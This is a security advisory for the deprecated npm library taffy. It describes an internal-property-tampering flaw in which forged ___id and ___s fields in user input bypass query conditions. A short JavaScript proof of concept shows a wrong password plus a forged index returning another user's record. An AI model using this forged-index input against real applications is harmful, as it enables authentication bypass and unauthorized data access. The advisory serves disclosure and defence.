SNYK-JS-TAFFY-546521

## Overview [taffy](https://www.npmjs.com/package/taffy) is an opensouce library that brings database features into your JavaScript applications. Affected versions of this package are vulnerable to Internal Property Tampering. `taffy` sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If an index is found in the query, `taffyDB` will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g. `T000002R000001`). As such, attackers can use this vulnerability to access any data items in the DB and exploit an SQL Injection. **Note:** The taffy package has been deprecated by the author. Its successor package, taffydb, is also found to be vulnerable and is not actively maintained. ### PoC ``` var TAFFY = require('taffy'); var friends = TAFFY([ {"id":1,"gender":"M","username":"Smith","password":"aaa","status":"Active"}, {"id":2,"gender":"F","username":"Ruth","password":"bbb","status":"Active"}, {"id":3,"gender":"M","username":"Stevenson","password":"ccc","status":"Active"}, {"id":4,"gender":"F","username":"Gill","password":"ddd","status":"Active"} ]); var json = {username:"Smith", "password":"123", "___id":"T000002R000002", "___s":true}; var item1 = friends(json); console.log(item1.first()); ``` ## Remediation There is no fixed version for `taffy`. ## References - [Taffy NPM Package Information](https://www.npmjs.com/package/taffy) - [Vulnerability Report](https://www.usenix.org/system/files/sec21-xiao.pdf)